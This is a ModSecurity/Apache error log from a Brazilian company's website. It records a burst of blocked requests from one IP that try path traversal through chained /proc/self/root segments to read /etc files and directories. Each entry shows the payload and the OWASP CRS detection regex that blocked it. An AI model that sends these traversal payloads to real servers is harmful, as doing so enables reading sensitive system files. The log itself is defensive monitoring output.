[Mon Mar 16 17:20:58.561788 2026] [:error] [pid 10772:tid 140411599251200] [client 74.7.241.46:34094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmKv9ocpUE4ed4uDwJ8gAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:20:59.905560 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:49422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmK6QpVkWug9HeOt9MdQAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:01.101119 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:49428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmLbABkC4fWIHEf8EMBAAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:02.455674 2026] [:error] [pid 29507:tid 140411548894976] [client 74.7.241.46:49432] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmLkr9dMAiw-8KANNehwAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:06.898970 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:49448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmMtSswJuvopo3lOh2SgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:08.307969 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:58620] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmNP9ocpUE4ed4uDwJ8wAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:09.574711 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:58624] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmNbABkC4fWIHEf8EMBgAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:11.947024 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:58626] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmN46lpbStxTqkSkuBjAAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:14.053518 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.241.46:58636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmOrysWC90G-1nBrBbgwAAAZE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:15.390462 2026] [:error] [pid 15568:tid 140411599251200] [client 74.7.241.46:58638] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmO6QpVkWug9HeOt9MeAAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:16.595708 2026] [:error] [pid 15061:tid 140411557287680] [client 74.7.241.46:58644] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmPKTCbgAP5jq5TehDqAAAAtY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:17.941089 2026] [:error] [pid 29802:tid 140411582465792] [client 74.7.241.46:58648] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmPc_BxrYCr4hPDw8BjQAAAdM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:19.311908 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:52186] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmP0r9dMAiw-8KANNelAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:20.569785 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:52200] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmQNSswJuvopo3lOh2TAAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:21.914807 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.241.46:52214] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmQbABkC4fWIHEf8EMCwAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:23.094633 2026] [:error] [pid 14895:tid 140411607643904] [client 74.7.241.46:52228] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmQ1ajLEzk2WiQ-10pnAAAApA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:24.479586 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:52242] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmRNSswJuvopo3lOh2TgAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:28.043786 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:52244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmSNSswJuvopo3lOh2UgAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:29.499523 2026] [:error] [pid 14895:tid 140411691570944] [client 74.7.241.46:58304] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmSVajLEzk2WiQ-10pogAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:31.895856 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.241.46:58312] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmS1ajLEzk2WiQ-10ppgAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 17:21:33.244988 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.241.46:58314] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhmTf9ocpUE4ed4uDwJ-AAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
